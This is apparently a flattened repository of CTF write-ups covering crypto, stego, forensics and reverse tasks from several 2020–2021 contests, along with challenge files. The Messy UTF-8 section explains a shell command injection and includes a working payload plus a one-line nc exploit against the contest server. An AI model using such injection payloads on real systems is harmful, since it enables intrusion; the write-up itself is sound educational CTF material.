| Knowing cryptography actually not only doesn't help, but also makes this task harder. 25 | We tried lots of different encryptions which match the parameters (like AES-CTR, AES-CCM, AES-GCM etc.), until we finally got a hit with ChaCha20. 26 | And only then we realised that there was a `dance` reference in the task description... 27 | 28 | ```python 29 | data = {"nonce": "dcfu+qXOX30=", "ciphertext": "nT0/C209haz3XQs6JcvrEhkbRXnzZiyR87vI82VDvfaQh9eajLNIzkG51TnZg81g7IEPd3UJElZz8xhCMlVb/cXHJO9h", 30 | "key": "Fidel_Alejandro_Castro_Ruz_Cuba!"} 31 | nonce = base64.b64decode(data['nonce']) 32 | ct = base64.b64decode(data['ciphertext']) 33 | key = data['key'] 34 | cipher = ChaCha20.new(key=key, nonce=nonce) 35 | plaintext = cipher.decrypt(ct) 36 | print(plaintext) 37 | ``` 38 | 39 | And we get `ctf{f38deb0782c0f252090a52b2f1a5b05bf2964272f65d5c3580be631f52f4b3e0}` 40 | -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/inorder/inorder.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import time 3 | 4 | FLAG = "REDACTED" 5 | TOTAL_INSERTS = 0 6 | 7 | class Node: 8 | 9 | def __init__(self, data): 10 | self.left = None 11 | self.right = None 12 | self.data = data 13 | 14 | def insert(self, data): 15 | newnode = Node(data) 16 | 17 | x = self 18 | y = None 19 | 20 | while (x != None): 21 | y = x 22 | if (data < x.data): 23 | x = x.left 24 | else: 25 | x = x.right 26 | 27 | if (y == None): 28 | y = newnode 29 | 30 | elif (data < y.data): 31 | y.left = newnode 32 | else: 33 | y.right = newnode 34 | 35 | return y 36 | 37 | def findval(self, lkpval, steps=0): 38 | if lkpval < self.data: 39 | if self.left is None: 40 | return False 41 | return self.left.findval(lkpval, steps+1) 42 | elif lkpval > self.data: 43 | if self.right is None: 44 | return False 45 | return self.right.findval(lkpval, steps+1) 46 | else: 47 | return True 48 | 49 | def PrintTree(self, order=""): 50 | if self.left: 51 | self.left.PrintTree("left") 52 | print( self.data, order), 53 | if self.right: 54 | self.right.PrintTree("right") 55 | 56 | 57 | r = Node('') 58 | print(( 59 | "Tell me your pleasure.\n" 60 | "/a values\n" 61 | "/s value\n" 62 | "/p\n" 63 | "/exit\n" 64 | ) 65 | ) 66 | 67 | while(True): 68 | inp = input("Your option: ") 69 | if(inp.startswith("/a")): 70 | values = inp.split(" ")[1].split(";") 71 | for val in values: 72 | if len(values) > 10001: 73 | break 74 | 75 | TOTAL_INSERTS += 1 76 | r.insert(val) 77 | 78 | print(TOTAL_INSERTS) 79 | sys.stdout.flush() 80 | elif(inp.startswith("/s")): 81 | print(r.findval(inp.split(" ")[1])) 82 | sys.stdout.flush() 83 | elif(inp.startswith("/p")): 84 | print(r.PrintTree()) 85 | sys.stdout.flush() 86 | elif(inp.startswith("/exit")): 87 | if(r.findval(FLAG)): 88 | sys.stdout.flush() 89 | break 90 | else: 91 | break 92 | 93 | print("Bye!") 94 | sys.exit() -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/modern/modern-login.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/modern/modern-login.apk -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/secret/rev_secret_secret: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/secret/rev_secret_secret -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/spy/app-release.apk.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/spy/app-release.apk.zip -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/spy/coordinates_can_be_found_here.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/spy/coordinates_can_be_found_here.jpg -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/stripped/rev_strippedGo_strippedGO.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/stripped/rev_strippedGo_strippedGO.out -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/stug/README.md: -------------------------------------------------------------------------------- 1 | # Stug reference (Stegano, 50p, 136 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | Do you have your own stug pass hidden within? 7 | 8 | Flag format: ctf{sha256} 9 | ``` 10 | 11 | In the task we get an image: 12 | 13 | ![](stug.jpg) 14 | 15 | ## Task analysis 16 | 17 | It's clear that task hints at using `steghide`. 18 | 19 | ## Solution 20 | 21 | We run: 22 | 23 | ``` 24 | steghide.exe --extract -sf stug.jpg 25 | ``` 26 | 27 | And guess the password to be `stug` and get: `ctf{32849dd9d7e7b313c214a7b1d004b776b4af0cedd9730e6ca05ef725a18e38e1}` 28 | -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/stug/stug.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/stug/stug.jpg -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/xor/README.md: -------------------------------------------------------------------------------- 1 | # Why XOR (crypto, 50p, 134 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | Let's be fair, we all start with XOR, and we keep enjoying it. 7 | 8 | Flag format: CTF{sha256} 9 | ``` 10 | 11 | In the task we get a simple [python script](xor.py) 12 | 13 | ## Task analysis 14 | 15 | The idea is pretty simple - flag was XORed with some unknown keystream. 16 | The hint suggests that first 3 bytes of the keystream are the same as first 3 bytes of the flag. 17 | 18 | ## Solution 19 | 20 | We could assume that flag prefix is `CTF` as stated in the task description. 21 | This proves to be invalid assumption, because it turnes out we should have guessed that it's actually `ctf` instead. 22 | 23 | Although code does not suggest it, we can also guess that the XOR key is repeated: 24 | 25 | ```python 26 | xored = ['\x00', '\x00', '\x00', '\x18', 'C', '_', '\x05', 'E', 'V', 'T', 'F', 'U', 'R', 'B', '_', 'U', 'G', '_', 'V', '\x17', 'V', 'S', '@', '\x03', '[', 27 | 'C', '\x02', '\x07', 'C', 'Q', 'S', 'M', '\x02', 'P', 'M', '_', 'S', '\x12', 'V', '\x07', 'B', 'V', 'Q', '\x15', 'S', 'T', '\x11', '_', '\x05', 28 | 'A', 'P', '\x02', '\x17', 'R', 'Q', 'L', '\x04', 'P', 'E', 'W', 'P', 'L', '\x04', '\x07', '\x15', 'T', 'V', 'L', '\x1b'] 29 | keystream = 'ctf' 30 | data = ''.join(xored) 31 | print(xor_string(keystream * 100, data)) 32 | ``` 33 | 34 | And we get `ctf{79f107231696395c004e87dd7709d3990f0d602a57e9f56ac428b31138bda258}` 35 | -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/xor/xor.py: -------------------------------------------------------------------------------- 1 | xored = ['\x00', '\x00', '\x00', '\x18', 'C', '_', '\x05', 'E', 'V', 'T', 'F', 'U', 'R', 'B', '_', 'U', 'G', '_', 'V', '\x17', 'V', 'S', '@', '\x03', '[', 'C', '\x02', '\x07', 'C', 'Q', 'S', 'M', '\x02', 'P', 'M', '_', 'S', '\x12', 'V', '\x07', 'B', 'V', 'Q', '\x15', 'S', 'T', '\x11', '_', '\x05', 'A', 'P', '\x02', '\x17', 'R', 'Q', 'L', '\x04', 'P', 'E', 'W', 'P', 'L', '\x04', '\x07', '\x15', 'T', 'V', 'L', '\x1b'] 2 | s1 = "" 3 | s2 = "" 4 | # ['\x00', '\x00', '\x00'] at start of xored is the best hint you get 5 | a_list = [chr(ord(a) ^ ord(b)) for a,b in zip(s1, s2)] 6 | print(a_list) 7 | print("".join(a_list)) -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/yopass/README.md: -------------------------------------------------------------------------------- 1 | # Yopass Go (re, 50p, 153 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | The password is so clear that it is the flag itself. 7 | 8 | Flag format: CTF{sha256} 9 | ``` 10 | 11 | In the task we get a [binary](yopass). 12 | 13 | ## Solution 14 | 15 | Not sure what the binary does at all, first sanity check with `strings yopass | grep ctf{` gives: 16 | 17 | `ctf{0962393ce380c3cf696c6c59a085cde0f7edd1382f2e9090220abdf9a6396c88}` 18 | -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/yopass/yopass: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/yopass/yopass -------------------------------------------------------------------------------- /2021-01-16-BambooFox/README.md: -------------------------------------------------------------------------------- 1 | # BambooFox CTF 2021 2 | 3 | Team: BitK, Sebbb, Shalom, SIben, Posix, XeR 4 | 5 | ### Table of contents 6 | 7 | * [Babystack (pwn)](babystack) 8 | * [wxpage (pwn)](wxpage) 9 | * [House of CSY (pwn)](hoc) 10 | * [Flag Checker Revenge (reverse)](flag_checker) 11 | * [TuringMachineDiagram (reverse)](turing) 12 | * [NGSteg (misc)](ngsteg) 13 | -------------------------------------------------------------------------------- /2021-01-16-BambooFox/flag_checker/README.md: -------------------------------------------------------------------------------- 1 | # Flag Checker Revenge - BambooFox CTF 2021 (reverse, 101p) 2 | 3 | ## Introduction 4 | Flag Checker Revenge is a reverse task. 5 | 6 | An x64 ELF binary is given. 7 | 8 | ## Reverse engineering 9 | The binary reads a password on the standard input. It then checks the size of 10 | the input is `0x2b` bytes. 11 | 12 | The binary then calls a serie of 500 functions that all do different checks on 13 | some parts of the flag. 14 | 15 | This can be solved with `angr`. 16 | 17 | **Flag**: `flag{4ll_7h3_w4y_70_7h3_d33p357_v4l1d4710n}` 18 | 19 | ## Appendices 20 | ### pwn.py 21 | ```python 22 | import angr 23 | 24 | BASE = 0x00400000 25 | START = BASE + 0x00009a95 26 | GOOD = BASE + 0x00009ab7 27 | BAD = BASE + 0x00009ac5 28 | 29 | project = angr.Project("./task") 30 | state = project.factory.blank_state(addr=START) 31 | state.regs.rbp = state.regs.rsp 32 | state.regs.rsp = state.regs.rbp - 0x50 33 | 34 | # Specify the flag 35 | flag = state.solver.BVS("password", 0x2B * 8) 36 | state.memory.store(state.regs.rbp - 0x50, flag) 37 | 38 | for i in range(0x2B): 39 | char = (flag >> (8 * i)) & 0xFF 40 | state.solver.add(0x20 <= char) 41 | state.solver.add(char < 0x80) 42 | 43 | simulation = project.factory.simgr(state) 44 | simulation.explore(find=GOOD, avoid=BAD) 45 | 46 | if simulation.found: 47 | solution = simulation.found[0].solver.eval(flag) 48 | print(hex(solution)[2:]) 49 | ``` 50 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/README.md: -------------------------------------------------------------------------------- 1 | # UTCTF 2021 2 | 3 | Team: Sebbb, Shalom, Posix, XeR 4 | 5 | ### Table of contents 6 | 7 | * [Sizzling bacon(beginner/crypto)](bacon) 8 | * [Various Venacular(beginner/crypto)](various) 9 | * [Emoji encryption(misc)](emoji) 10 | * [Python shell(misc)](pyjail) 11 | * [Farmers only(misc/crypto)](farmer) 12 | * [RF is sOOKy(misc)](radio) 13 | * [Doubly delted data(for)](delete) 14 | * [OSINT part 2(for)](osint2) 15 | * [Sandwiched(for)](sandwich) 16 | * [smol data(for)](smol_data) 17 | * [Small p problems(crypto)](small_p) 18 | * [Illegal prime(crypto)](illegal) 19 | * [Prove no knowledge(crypto)](zkp) 20 | * [A bit weird(crypto)](a_bit) 21 | * [Sleeves(crypto)](sleeves) 22 | * [Chilly beef code(crypto)](cbc) 23 | * [Functional Programming (pwn)](functional) 24 | * [Resolve (pwn)](resolve) 25 | * [Linker Machine Broke (pwn)](linker) 26 | * [Messy UTF-8 (pwn)](messy_utf8) 27 | * [AEG (pwn)](aeg) 28 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/a_bit/bit_weird.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util import number 2 | from secret import flag 3 | import os 4 | 5 | length = 2048 6 | p, q = number.getPrime(length//2), number.getPrime(length//2) 7 | N = p*q 8 | e = 3 9 | 10 | m = number.bytes_to_long(flag) 11 | x = number.bytes_to_long(os.urandom(length//8)) 12 | 13 | c = pow(m|x, e, N) 14 | print('N =', N); 15 | print('e =', e); 16 | print('c =', c); 17 | print('m&x =', m&x); 18 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/a_bit/bit_weird_msg.txt: -------------------------------------------------------------------------------- 1 | N = 13876129555781460073002089038351520612247655754841714940325194761154811715694900213267064079029042442997358889794972854389557630367771777876508793474170741947269348292776484727853353467216624504502363412563718921205109890927597601496686803975210884730367005708579251258930365320553408690272909557812147058458101934416094961654819292033675534518433169541534918719715858981571188058387655828559632455020249603990658414972550914448303438265789951615868454921813881331283621117678174520240951067354671343645161030847894042795249824975975123293970250188757622530156083354425897120362794296499989540418235408089516991225649 2 | e = 3 3 | c = 6581985633799906892057438125576915919729685289065773835188688336898671475090397283236146369846971577536055404744552000913009436345090659234890289251210725630126240983696894267667325908895755610921151796076651419491871249815427670907081328324660532079703528042745484899868019846050803531065674821086527587813490634542863407667629281865859168224431930971680966013847327545587494254199639534463557869211251870726331441006052480498353072578366929904335644501242811360758566122007864009155945266316460389696089058959764212987491632905588143831831973272715981653196928234595155023233235134284082645872266135170511490429493 4 | m&x = 947571396785487533546146461810836349016633316292485079213681708490477178328756478620234135446017364353903883460574081324427546739724 5 | 6 | x = 15581107453382746363421172426030468550126181195076252322042322859748260918197659408344673747013982937921433767135271108413165955808652424700637809308565928462367274272294975755415573706749109706624868830430686443947948537923430882747239965780990192617072654390726447304728671150888061906213977961981340995242772304458476566590730032592047868074968609272272687908019911741096824092090512588043445300077973100189180460193467125092550001098696240395535375456357081981657552860000358049631730893603020057137233513015505547751597823505590900290756694837641762534009330797696018713622218806608741753325137365900124739257740 7 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/aeg/angr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/aeg/angr.png -------------------------------------------------------------------------------- /2021-03-13-UTCTF/bacon/README.md: -------------------------------------------------------------------------------- 1 | # Sizzling Bacon (beginner/crypto, 100p, 417 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | My buddy Francis is really into Bacon. He loves it so much that he gave me this encoded bacon-themed flag (he said he was inspired by the sound of sizzling bacon). 7 | 8 | sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs} 9 | ``` 10 | 11 | 12 | ## Task analysis 13 | 14 | It's pretty clear that we're dealing with Bacon Cipher just instead of A/B or 0/1 we have S and s. 15 | 16 | ## Solution 17 | 18 | We can change the input into more classic version: 19 | 20 | ```python 21 | ct = 'sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs}' 22 | ct = ct.replace('S', '0').replace('s', '1') 23 | print(ct) 24 | ``` 25 | 26 | And drop into cyberchef https://gchq.github.io/CyberChef/#recipe=Bacon_Cipher_Decode('Complete','0/1',false)&input=MTAxMDAxMDAxMTAwMTAxMDEwMTEwMDAwMDAwMTEwezAwMDEwMTAwMDEwMTAwMDEwMDEwMDExMTExMTAwMDAwMDAxMDAwMDAwMDAxMDAxMTEwMDExMDEwMDAxMDAxMDAwMDExMTEwMDExMTAwMTAwMTAwMDF9 27 | 28 | and we get `UTFLAG{CRISPYBACONCIPHER}` 29 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/delete/README.md: -------------------------------------------------------------------------------- 1 | # Doubly deleted data (forensics, 330p, 260 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | We got a copy of an elusive hacker's home partition and gave it to someone back in HQ to analyze for us. We think the hacker deleted the file with the flag, but before our agent could find it, they accidentally deleted the copy of the partition! Now we'll never know what that flag was. :( 7 | ``` 8 | 9 | We get [some gzipped disk image](flash_drive.img.gz) 10 | 11 | ## Solution 12 | 13 | Load this image into your favourite hexeditor and just look for flag format, or do `strings flash_drive.img | grep utflag` and you get: 14 | 15 | ``` 16 | utflag{data_never_disappears} 17 | utflag{data_never_disappears} 18 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 19 | utflag{data_never_disappears} 20 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 21 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 22 | utflag{data_never_disappears} 23 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 24 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 25 | utflag{data_never_disappears} 26 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 27 | ``` 28 | 29 | Submit `utflag{d@t@_never_dis@ppe@rs}` 30 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/delete/flash_drive.img.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/delete/flash_drive.img.gz -------------------------------------------------------------------------------- /2021-03-13-UTCTF/emoji/README.md: -------------------------------------------------------------------------------- 1 | # Emoji encryption (misc, 100p, 379 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | I came up with this rad new encryption. Bet no one can break it 7 | 8 | ☂️🦃🔥🦁🍎🎸{🐘🥭🧅🤹🧊☀️_💣🐘_🌋🐘🌈☀️🍎🦃🧊🦁🐘} 9 | ``` 10 | 11 | 12 | ## Task analysis 13 | 14 | Flag format is preserved, so we can expect each emoji to encode a single letter. 15 | We know that format is `utflag{}`. 16 | 17 | 18 | ## Solution 19 | 20 | First letter of the flag should be `u` and emoji is `umbrella`, second letter should be `t` and emoji is `turkey`... 21 | 22 | `utflag{emojis_be_versatile}` 23 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/illegal/README.md: -------------------------------------------------------------------------------- 1 | # Illegal prime (crypto, 799p, 143 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | The NSA published the ciphertext from a one-time-pad. Since breaking one-time-pad is so easy, I did it for you. 7 | 8 | To avoid legal trouble I can't tell you the key. On an unrelated note I found this really cool prime number ( https://en.wikipedia.org/wiki/Illegal_prime ) 9 | ``` 10 | 11 | We get also: 12 | 13 | ``` 14 | c = 2f7f63b5e27343dcf750bf83fb4893fe3b20a87e81e6fb62c33d30 15 | 16 | p = 56594044391339477686029513026021974392498922525513994709310909529135745009448534622250639333011770158535778535848522177601610597930145120019374953248865595853915254057748042248348224821499113613633807994411737092129239655022633988633736058693251230631716531822464530907151 17 | ``` 18 | 19 | ## Task analysis 20 | 21 | Task hints at `illegal prime` story, where binary representation of certain number could be treated as machine code with an exploit. 22 | 23 | ## Solution 24 | 25 | If we do `print(long_to_bytes(p))` on the provided prime we get: 26 | 27 | ``` 28 | k = 5a0b05d9831438ac8561d2b0a42be1cf5613db21deb9a443e21c4d 29 | ``` 30 | 31 | Now that we have the key we can just unxor the flag: 32 | 33 | ```python 34 | c = '2f7f63b5e27343dcf750bf83fb4893fe3b20a87e81e6fb62c33d30'.decode('hex') 35 | print(xor_string(c, '5a0b05d9831438ac8561d2b0a42be1cf5613db21deb9a443e21c4d'.decode("hex"))) 36 | ``` 37 | 38 | And get `utflag{pr1m3_cr1m3s____!!!}` 39 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/messy_utf8/README.md: -------------------------------------------------------------------------------- 1 | # Messy UTF-8 - UTCTF 2021 (pwn, 987p, 38 solved) 2 | 3 | ## Introduction 4 | Messy UTF-8 is a binary exploitation task. 5 | 6 | An x64 ELF binary is given. It waits for user input and echoes it back. 7 | 8 | ## Reverse engineering 9 | The binary first starts by reading the user input in a buffer of size 100. 10 | ```c 11 | char input[100]; 12 | fgets(input, 100, stdin); 13 | ``` 14 | 15 | It then calls the `escape` function on it and stores the output in a buffer of 16 | size 400. 17 | ```c 18 | char escaped[400]; 19 | escape(escaped, input); 20 | ``` 21 | 22 | The escape function replaces single quotes `'` with `'\''`. This is the classic 23 | escape sequence for posix shells. 24 | ```c 25 | void escape(char *out, char *in) 26 | { 27 | while(*in) { 28 | if(*in == '\'') { 29 | out[0] = '\''; 30 | out[1] = '\\'; 31 | out[2] = '\''; 32 | out[3] = '\''; 33 | out += 4; 34 | } else { 35 | out[0] = in[0]; 36 | out += 1; 37 | } 38 | 39 | in++; 40 | } 41 | } 42 | ``` 43 | 44 | The output is then concatenated between `echo '` and `'`. 45 | 46 | The new string is altered by the `parseUTF8` function. This function looks for 47 | invalid UTF-8 codepoints and skip them. 48 | 49 | The final string is passed to `system`. 50 | 51 | ## Vulnerabilities 52 | It is possible to abuse the `parseUTF8` function to skip characters. 53 | 54 | Consider an input of `\xF0'; foobar #`. The `escape` pass will transform it to 55 | `\xF0'\''; foobar #` and the concatenation part will transform it to 56 | `echo '\xF0'\''; foobar #'`. 57 | 58 | `parseUTF8` will see an invalid 4 bytes codepoint (`\xF0\x27\x5C\x27`) and skip 59 | it entirely, transforming the string to `echo ''; foobar #'`. 60 | 61 | ## Exploitation 62 | It is possible to read the `flag.txt` file with a payload of 63 | `\xF0'; cat flag.txt #` 64 | 65 | **Flag**: `utflag{shouldve_had_error_conditions871234}` 66 | 67 | ## Appendices 68 | ### pwn.sh 69 | ```sh 70 | printf "\xF0'; ls -la; cat *flag* #\n" | nc pwn.utctf.live 5434 71 | ``` 72 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/osint2/README.md: -------------------------------------------------------------------------------- 1 | # OSINT2 (forensics, 766p, 154 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | Find the origins of the linked file found in part 1. 7 | ``` 8 | 9 | ## Task analysis 10 | 11 | We start-off where we finished previous task, at https://twitter.com/ColdwaterWade and we assume we need to find the origin of image https://drive.google.com/file/d/1nhmAthcCUWZ-9ekD20nvVdlannsMPYlb/view 12 | 13 | ## Solution 14 | 15 | We simply drop this image into Google Reverse Image Search and it tells us the image comes from https://tobiasmaier.blogspot.com/2021/03/blog-post_6.html and we get flag `utflag{r3v3rs3d_t0_0r1g1nal}` 16 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/radio/README.md: -------------------------------------------------------------------------------- 1 | # RF is spOOKy (misc, 996p, 21 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | ACME corp has contracted you to figure out how to demodulate a secret RF signal recorded with an rtl-sdr. They have recorded many identical bursts, but your job is to demodulate one of them. 7 | Flag format: utflag{DEMODULATED_BITSTREAM} where DEMODULATED_BITSTREAM is the actual 37 bits that were transferred over the air. file format: sample rate = 180000hz , sample type = unsigned 8-bit 8 | ``` 9 | 10 | We get [some data](off.iq) 11 | 12 | 13 | ## Task analysis 14 | 15 | It's pretty clear that we have some kind of radio transmission, and it seems there is some secret bit pattern sent multiple times. 16 | Our goal is to demodulate the data and recover the bitstream. 17 | 18 | ## Solution 19 | 20 | We initially tried loading this into GNU Radio, but we realised we have absolutely no idea how to use it... 21 | So it's Audacity time! 22 | 23 | Once we load this as raw data and set the bitrate we can play this as audio. 24 | It's clear that in the middle there is a bunch of beeps. 25 | We assume that those beeps are the `bursts` with secret bits. 26 | 27 | Once we zoom-in on them we can see a clear regular pattern. 28 | What is more interesting is that if we cut this into pieces of similar length, we get... 37. 29 | 30 | ![](demodulate.png) 31 | 32 | We can just type the bits and submit `utflag{1011001011011001011001001001001011001}` 33 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/radio/demodulate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/radio/demodulate.png -------------------------------------------------------------------------------- /2021-03-13-UTCTF/radio/off.iq: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/radio/off.iq -------------------------------------------------------------------------------- /2021-03-13-UTCTF/sandwich/README.md: -------------------------------------------------------------------------------- 1 | # Sandwiched (forensics, 787p, 147 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | I got this super confidential document that is supposed to have secret information about the flag, but there's nothing useful in the PDF! 7 | ``` 8 | 9 | We get [a pdf](secret.pdf) 10 | 11 | ## Solution 12 | 13 | We initially loaded this into PDF Stream Dumper, but there didn't seem to be anything particularly interesting in the streams. 14 | Then we decided to check if it's really just a PDF, and `binwalk` told us there is a JPG inside. 15 | We carve out this JPG and get: 16 | 17 | ![](flag.jpg) 18 | 19 | `utflag{file_sandwich_artist}` -------------------------------------------------------------------------------- /2021-03-13-UTCTF/sandwich/flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/sandwich/flag.jpg -------------------------------------------------------------------------------- /2021-03-13-UTCTF/sandwich/secret.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/sandwich/secret.pdf -------------------------------------------------------------------------------- /2021-03-13-UTCTF/small_p/README.md: -------------------------------------------------------------------------------- 1 | # Small p problems (crypto, 420p, 242 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | My buddies Whitfield and Martin were trying to share a secret key between themselves, and I was able to eavesdrop on their conversation. I bet I could probably figure out their shared secret with a little math... 7 | 8 | p = 69691 9 | g = 1001 10 | 11 | A = 17016 12 | B = 47643 13 | 14 | Note: submit either the shared secret or the shared secret wrapped in utflag{} 15 | ``` 16 | 17 | ## Task analysis 18 | 19 | It seems we just have parameters of DH exchange with very small values. 20 | 21 | ## Solution 22 | 23 | Similarly to first part of `Farmers only` we can simply calculate discrete logarithm, eg. with BS-GS, and then calculate shared secret. 24 | 25 | ```python 26 | def baby_steps_giant_steps(a, b, p, N=None): 27 | if not N: N = 1 + int(math.sqrt(p)) 28 | baby_steps = {} 29 | baby_step = 1 30 | for r in long_range(0, N + 1): 31 | baby_steps[baby_step] = r 32 | baby_step = baby_step * a % p 33 | giant_stride = pow(a, (p - 2) * N, p) 34 | giant_step = b 35 | for q in long_range(0, N ** 8 + 1): 36 | if giant_step in baby_steps: 37 | result = q * N + baby_steps[giant_step] 38 | return result 39 | else: 40 | giant_step = giant_step * giant_stride % p 41 | 42 | 43 | def main(): 44 | p = 69691 45 | g = 1001 46 | A = 17016 47 | B = 47643 48 | a = baby_steps_giant_steps(g, A, p) 49 | b = baby_steps_giant_steps(g, B, p) 50 | print(pow(g, a * b, p)) 51 | ``` 52 | 53 | And we get `53919` 54 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/smol_data/anomaly_detect.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/smol_data/anomaly_detect.zip -------------------------------------------------------------------------------- /2021-03-13-UTCTF/various/README.md: -------------------------------------------------------------------------------- 1 | # Various Venacular (beginner/crypto, 340p, 258 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | This flag was intercepted. wmysau{foeim_Tfusoli} 7 | 8 | Unfortunately, it seems to be encrypted. Additional encrypted text was also found. 9 | Hkgxologflutleiaymt xgf Azutgkrftmtf ltmntf ERW wfr ELW wfmtk Rkweq. 10 | ``` 11 | 12 | 13 | ## Task analysis 14 | 15 | It's pretty clear we're dealing with some substitution cipher with only a-zA-Z charset. 16 | It's not monoalphabetic, so most likely Vigenere. 17 | 18 | 19 | ## Solution 20 | 21 | We could try some cryptanalysis on the second, longer text, but there is a simpler way. 22 | We can strip flag format and put this into https://quipqiup.com/ setting clue `wmysau=utflag` and this gives us: 23 | 24 | `utflag nicht English` 25 | 26 | We can similarly drop the text to get: 27 | 28 | `Provisionsgeschafte von Amgeordneten setzen CDU und CSU unter Druck.` 29 | -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/README.md: -------------------------------------------------------------------------------- 1 | # VolgaCTF Quals 2021 2 | 3 | Team: BitK, SakiiR, XeR, mastho, ,Shalom 4 | 5 | ### Table of contents 6 | 7 | * [Knock-knock(crypto)](knock) 8 | * [Streams(stegastics)](streams) 9 | * [Inception(stegastics)](inception) 10 | -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/inception/1st_level.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/inception/1st_level.png -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/inception/egypt.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/inception/egypt.pdf -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/inception/lsb.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/inception/lsb.zip -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/knock/knockd.pcap: -------------------------------------------------------------------------------- 